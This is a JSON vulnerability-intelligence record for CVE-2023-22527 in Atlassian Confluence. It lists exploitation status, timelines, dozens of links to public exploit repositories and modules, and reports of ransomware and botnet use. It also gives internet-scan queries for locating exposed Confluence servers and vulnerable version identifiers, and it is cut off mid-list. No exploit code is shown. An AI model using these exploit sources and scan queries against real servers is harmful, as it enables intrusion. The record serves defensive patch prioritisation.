



























[
{
"id": "CVE-2023-22527",
"public_exploit_found": true,
"commercial_exploit_found": true,
"weaponized_exploit_found": true,
"max_exploit_maturity": "weaponized",
"reported_exploited_by_honeypot_service": true,
"reported_exploited_by_vulncheck_canaries": false,
"reported_exploited": true,
"reported_exploited_by_threat_actors": true,
"reported_exploited_by_ransomware": true,
"reported_exploited_by_botnets": true,
"inKEV": true,
"inVCKEV": true,
"timeline": {
"nvd_published": "2024-01-16T05:15:08.29Z",
"nvd_last_modified": "2025-02-09T20:50:17.667Z",
"first_exploit_published": "2024-01-19T00:00:00Z",
"first_exploit_published_weaponized_or_higher": "2024-01-22T00:00:00Z",
"most_recent_exploit_published": "2025-05-19T00:00:00Z",
"first_reported_threat_actor": "2024-01-19T00:00:00Z",
"most_recent_reported_threat_actor": "2025-10-09T00:00:00Z",
"first_reported_ransomware": "2024-03-07T00:00:00Z",
"most_recent_reported_ransomware": "2025-05-05T00:00:00Z",
"first_reported_botnet": "2024-03-20T00:00:00Z",
"most_recent_reported_botnet": "2025-07-17T00:00:00Z",
"cisa_kev_date_added": "2024-01-24T00:00:00Z",
"cisa_kev_date_due": "2024-02-14T00:00:00Z",
"vulncheck_kev_date_added": "2024-01-19T00:00:00Z",
"vulncheck_kev_date_due": "2024-02-14T00:00:00Z"
},
"trending": {
"github": false
},
"epss": {
"epss_score": 0.94316,
"epss_percentile": 0.99944,
"last_modified": "2025-10-06T13:40:10.389902143Z"
},
"counts": {
"exploits": 40,
"threat_actors": 3,
"botnets": 3,
"ransomware_families": 2
},
"exploits": [
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/remote-exploits/39278.txt",
"name": "Atlassian Confluence SSTI Injection Exploit",
"refsource": "0day.today",
"date_added": "2024-01-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/web-applications/39469.txt",
"name": "Atlassian Confluence < 8.5.3 - Remote Code Execution Exploit",
"refsource": "0day.today",
"date_added": "2024-03-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/",
"name": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://attackerkb.com/topics/wONJMCgCgl/cve-2023-22527",
"name": "CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://boogipop.com/2024/02/13/Atlassian%20Confluence%20CVE-2023-22527%20%E5%88%86%E6%9E%90%E5%8F%8A%E6%AD%A6%E5%99%A8%E5%8C%96%E5%AE%9E%E7%8E%B0/",
"name": "Atlassian Confluence CVE-2023-22527 分析及武器化实现",
"refsource": "blogs",
"date_added": "2024-02-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://vulncheck.com/blog/confluence-dreams-of-shells",
"name": "Does Confluence Dream of Shells?",
"refsource": "blogs",
"date_added": "2024-03-08T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.labs.greynoise.io/grimoire/2024-03-confluence-where-are-they-now/",
"name": "Where are they now? Starring: Confluence CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-03-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/pwning-confluence-via-ognl-injection-for-fun-and-learning-cve-2023-22527",
"name": "Pwning Confluence via OGNL Injection for fun and learning - CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-04-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/automated-pwning-confluence-via-ognl-injection-cve-2023-22527",
"name": "Automated pwning Confluence via OGNL Injection (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-06-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html",
"name": "Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence",
"refsource": "blogs",
"date_added": "2024-08-30T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware",
"refsource": "blogs",
"date_added": "2025-05-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.coresecurity.com/core-labs/exploits",
"name": "Atlassian Confluence text-inline OGNL Injection Vulnerability Exploit",
"refsource": "coreimpact",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available"
},
{
"url": "https://github.com/Drun1baby/CVE-2023-22527",
"name": "Drun1baby/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Drun1baby/CVE-2023-22527/main/PoC.txt",
"clone_ssh_url": "git@github.com:Drun1baby/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Drun1baby/CVE-2023-22527.git"
},
{
"url": "https://github.com/cleverg0d/CVE-2023-22527",
"name": "cleverg0d/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/cleverg0d/CVE-2023-22527/main/README.md",
"clone_ssh_url": "git@github.com:cleverg0d/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/cleverg0d/CVE-2023-22527.git"
},
{
"url": "https://github.com/thanhlam-attt/CVE-2023-22527",
"name": "thanhlam-attt/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/thanhlam-attt/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:thanhlam-attt/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/thanhlam-attt/CVE-2023-22527.git"
},
{
"url": "https://github.com/C1ph3rX13/CVE-2023-22527",
"name": "C1ph3rX13/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22527/main/CVE-2023-22527.go",
"clone_ssh_url": "git@github.com:C1ph3rX13/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/C1ph3rX13/CVE-2023-22527.git"
},
{
"url": "https://github.com/Chocapikk/CVE-2023-22527",
"name": "Chocapikk/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Chocapikk/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:Chocapikk/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Chocapikk/CVE-2023-22527.git"
},
{
"url": "https://github.com/Manh130902/CVE-2023-22527-POC",
"name": "Manh130902/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Manh130902/CVE-2023-22527-POC/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Manh130902/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Manh130902/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/Niuwoo/CVE-2023-22527",
"name": "Niuwoo/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Niuwoo/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Niuwoo/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Niuwoo/CVE-2023-22527.git"
},
{
"url": "https://github.com/RevoltSecurities/CVE-2023-22527",
"name": "RevoltSecurities/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/RevoltSecurities/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:RevoltSecurities/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/RevoltSecurities/CVE-2023-22527.git"
},
{
"url": "https://github.com/VNCERT-CC/CVE-2023-22527-confluence",
"name": "VNCERT-CC/CVE-2023-22527-confluence exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/VNCERT-CC/CVE-2023-22527-confluence/main/exploit-CVE-2023-22527.js",
"clone_ssh_url": "git@github.com:VNCERT-CC/CVE-2023-22527-confluence.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/VNCERT-CC/CVE-2023-22527-confluence.git"
},
{
"url": "https://github.com/Vozec/CVE-2023-22527",
"name": "Vozec/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Vozec/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Vozec/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Vozec/CVE-2023-22527.git"
},
{
"url": "https://github.com/Privia-Security/CVE-2023-22527",
"name": "Privia-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Privia-Security/CVE-2023-22527/main/main.go",
"clone_ssh_url": "git@github.com:Privia-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Privia-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/yoryio/CVE-2023-22527",
"name": "yoryio/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/yoryio/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:yoryio/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/yoryio/CVE-2023-22527.git"
},
{
"url": "https://github.com/MaanVader/CVE-2023-22527-POC",
"name": "MaanVader/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/MaanVader/CVE-2023-22527-POC/master/exploit.py",
"clone_ssh_url": "git@github.com:MaanVader/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/MaanVader/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/adminlove520/CVE-2023-22527",
"name": "adminlove520/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/adminlove520/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:adminlove520/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/adminlove520/CVE-2023-22527.git"
},
{
"url": "https://github.com/YongYe-Security/CVE-2023-22527",
"name": "YongYe-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-02T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/YongYe-Security/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:YongYe-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/YongYe-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL",
"name": "Boogipop/CVE-2023-22527-Godzilla-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-11T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL/main/src/main/Main.java",
"clone_ssh_url": "git@github.com:Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git"
},
{
"url": "https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL",
"name": "M0untainShley/CVE-2023-22527-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/M0untainShley/CVE-2023-22527-MEMSHELL/master/src/main/Main.java",
"clone_ssh_url": "git@github.com:M0untainShley/CVE-2023-22527-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/M0untainShley/CVE-2023-22527-MEMSHELL.git"
},
{
"url": "https://github.com/vulncheck-oss/cve-2023-22527",
"name": "vulncheck-oss/cve-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-03-04T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/vulncheck-oss/cve-2023-22527/main/README.md?token=GHSAT0AAAAAACO2HCW4FJ4YNPSHC4TPP4AUZPHLNSQ",
"clone_ssh_url": "git@github.com:vulncheck-oss/cve-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/vulncheck-oss/cve-2023-22527.git"
},
{
"url": "https://github.com/BBD-YZZ/Confluence-RCE",
"name": "BBD-YZZ/Confluence-RCE exploit repository",
"refsource": "github-exploits",
"date_added": "2024-05-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/BBD-YZZ/Confluence-RCE/master/pocs/CVE_2023_22527.py",
"clone_ssh_url": "git@github.com:BBD-YZZ/Confluence-RCE.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/BBD-YZZ/Confluence-RCE.git"
},
{
"url": "https://github.com/kh4sh3i/CVE-2023-22527",
"name": "kh4sh3i/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-06T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/kh4sh3i/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:kh4sh3i/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/kh4sh3i/CVE-2023-22527.git"
},
{
"url": "https://github.com/AxthonyV/CVE-2023-22527",
"name": "AxthonyV/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-07T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/AxthonyV/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:AxthonyV/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/AxthonyV/CVE-2023-22527.git"
},
{
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "metasploit",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2023/CVE-2023-22527.yaml",
"name": "Atlassian Confluence - Remote Code Execution",
"refsource": "nuclei-templates",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "packetstorm",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/177643/Atlassian-Confluence-8.5.3-Remote-Code-Execution.html",
"name": "Atlassian Confluence 8.5.3 Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-03-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/179520/Confluence-Template-Injection-Remote-Code-Execution.html",
"name": "Confluence Template Injection Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-07-15T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://api.vulncheck.com/v3/index/initial-access?cve=CVE-2023-22527",
"name": "Confluence Template Injection (text-inline.vm)",
"refsource": "vulncheck-initial-access",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available",
"exploit_type": "initial-access",
"clone_ssh_url": "git@git.vulncheck.com:vulncheck/initial-access.git"
},
{
"url": "https://x.com/ptswarm/status/1748331385968795882",
"name": "We have reproduced CVE-2023-22527 in Atlassian Confluence",
"refsource": "x",
"date_added": "2024-01-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "privately-available"
}
],
"reported_exploitation": [
{
"url": "https://www.ptsecurity.com/ru-ru/research/analytics/itogi-proektov-po-rassledovaniyu-inczidentov-i-retrospektivnomu-analizu-2023-2024/#id1",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-11-06T00:00:00Z"
},
{
"url": "https://www4.orangecyberdefense.com/security-navigator-2025-en",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-12-05T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-24T00:00:00Z"
},
{
"url": "https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-27T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-05-19T00:00:00Z"
},
{
"url": "https://app.crowdsec.net/cti/cve-explorer/CVE-2023-22527",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-06-07T00:00:00Z"
},
{
"url": "https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-10-09T00:00:00Z"
}
],
"date_added": "2024-01-19T00:00:00Z",
"_timestamp": "2025-10-10T08:49:45.954951346Z"
}
]
[
{
"cve": "CVE-2023-22527",
"inKEV": true,
"inVCKEV": true,
"artifacts": [
{
"vendor": "Confluence",
"targetEncryptedComms": "either",
"mitreAttackTechniques": [
"T1190"
],
"product": [
"Confluence Server",
"Confluence Data Center"
],
"dateAdded": "2024-01-22T00:00:00Z",
"artifactName": "Confluence Template Injection (text-inline.vm)",
"exploit": true,
"versionScanner": true,
"pcap": true,
"sigmaRule": false,
"suricataRule": true,
"snortRule": true,
"yara": true,
"nmapScript": true,
"zeroday": false,
"targetService": "HTTP",
"targetDocker": true,
"googleQueries": [],
"googleRawQueries": [],
"baiduQueries": [
"https://www.baidu.com/s?wd=intitle%3A%22Log%20In%20-%20Confluence%22"
],
"baiduRawQueries": [
"intitle:\"Log In - Confluence\""
],
"shodanQueries": [
"https://www.shodan.io/search?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22JSESSIONID%22+%2Bhtml%3A%22atlassian-authentication-plugin%22+-%22145DF9C4CDE560B2699212692B867CDA%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22Set-Cookie%3A+JSESSIONID%22+%2Bhtml%3A%22SAML+POST+Binding%22"
],
"censysQueries": [
"https://platform.censys.io/search?q=host.services%3A%28endpoints.http.favicons.hash_md5%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22%20and%20banner%3A%22Set-Cookie%3A%20JSESSIONID%22%20and%20banner%3A%22X-Confluence-Request-Time%22%20and%20endpoints.http.body%3A%22confluence-context-path%22%29"
],
"censysLegacyQueries": [
"https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.favicons.md5_hash%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22+and+services.banner%3A%22Set-Cookie%3A+JSESSIONID%22+and+services.banner%3A%22X-Confluence-Request-Time%22+and+services.http.response.body%3A%22confluence-context-path%22%29"
],
"driftnetQueries": [],
"driftnetRawQueries": [],
"greynoiseQueries": [
"https://viz.greynoise.io/query?gnql=raw_data.web.paths%3A%22%2Ftemplate%2Faui%2Ftext-inline.vm%22",
"https://viz.greynoise.io/tag/atlassian-confluence-template-injection-rce-attempt-cve-2023-22527"
],
"fofaQueries": [
"https://en.fofa.info/result?qbase64=aGVhZGVyPSJTZXQtQ29va2llOiBKU0VTU0lPTklEIiAmJiBoZWFkZXI9IlgtQ29uZmx1ZW5jZS1SZXF1ZXN0LVRpbWUiICYmIGJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uX2hhc2g9Ii0zMDUxNzkzMTIi"
],
"fofaRawQueries": [
"header=\"Set-Cookie: JSESSIONID\" && header=\"X-Confluence-Request-Time\" && body=\"confluence-context-path\" && icon_hash=\"-305179312\""
],
"zoomEyeQueries": [
"https://www.zoomeye.ai/searchResult?q=aHR0cC5oZWFkZXI9IlNldC1Db29raWU6IEpTRVNTSU9OSUQiICYmIGh0dHAuaGVhZGVyPSJYLUNvbmZsdWVuY2UtUmVxdWVzdC1UaW1lIiAmJiBodHRwLmJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uaGFzaD0iLTMwNTE3OTMxMiI%3D"
],
"zoomEyeRawQueries": [
"http.header=\"Set-Cookie: JSESSIONID\" && http.header=\"X-Confluence-Request-Time\" && http.body=\"confluence-context-path\" && iconhash=\"-305179312\""
],
"shodanRawQueries": [
"+http.favicon.hash:-305179312 \"X-Confluence-Request-Time\" +\"Set-Cookie: JSESSIONID=\" +html:\"confluence-context-path\"",
"X-Confluence-Request-Time +\"JSESSIONID\" +html:\"atlassian-authentication-plugin\" -\"145DF9C4CDE560B2699212692B867CDA\"",
"X-Confluence-Request-Time +\"Set-Cookie: JSESSIONID\" +html:\"SAML POST Binding\""
],
"censysRawQueries": [
"host.services:(endpoints.http.favicons.hash_md5=\"966e60f8eb85b7ea43a7b0095f3e2336\" and banner:\"Set-Cookie: JSESSIONID\" and banner:\"X-Confluence-Request-Time\" and endpoints.http.body:\"confluence-context-path\")"
],
"censysLegacyRawQueries": [
"same_service(services.http.response.favicons.md5_hash=\"966e60f8eb85b7ea43a7b0095f3e2336\" and services.banner:\"Set-Cookie: JSESSIONID\" and services.banner:\"X-Confluence-Request-Time\" and services.http.response.body:\"confluence-context-path\")"
],
"cloneSSHURL": "git@git.vulncheck.com:vulncheck/initial-access.git"
}
],
"vulnerable_cpes": [
"cpe:2.3:a:atlassian:confluence_data_center:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.1:*:*:*:*:*:*:*",
